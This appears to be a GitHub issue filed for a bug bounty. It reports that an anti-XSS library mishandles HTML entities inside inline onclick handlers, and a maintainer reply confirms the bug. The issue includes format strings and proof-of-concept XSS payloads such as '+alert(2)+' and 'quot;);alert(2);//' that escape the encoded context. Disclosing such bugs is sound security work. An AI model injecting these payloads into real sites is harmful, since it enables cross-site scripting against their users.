Open tank1st99 opened 6 years ago
The library incorrectly resolves contexts with HTML-entities inside the inlined JS-code.
False Positive: Format String: <a href="#" onclick="alert("{0}");">test</a> Payload: False Positive
<a href="#" onclick="alert("{0}");">test</a>
False Positive
XSS 1: Format String: <a href='#' onclick='alert(""{0}"");'>XSS</a> Payload: +alert(2)+
<a href='#' onclick='alert(""{0}"");'>XSS</a>
+alert(2)+
XSS 2: Format String: <a href="#" onclick='alert("Tom&{0}");'>XSS?</a> Payload: quot;);alert(2);//
<a href="#" onclick='alert("Tom&{0}");'>XSS?</a>
quot;);alert(2);//
The bug is confirmed. Please contact me at vkochetkov@ptsecurity.com to get information on receiving prizes.
The library incorrectly resolves contexts with HTML-entities inside the inlined JS-code.
False Positive: Format String:
<a href="#" onclick="alert("{0}");">test</a>
Payload:False Positive
XSS 1: Format String:
<a href='#' onclick='alert(""{0}"");'>XSS</a>
Payload:+alert(2)+
XSS 2: Format String:
<a href="#" onclick='alert("Tom&{0}");'>XSS?</a>
Payload:quot;);alert(2);//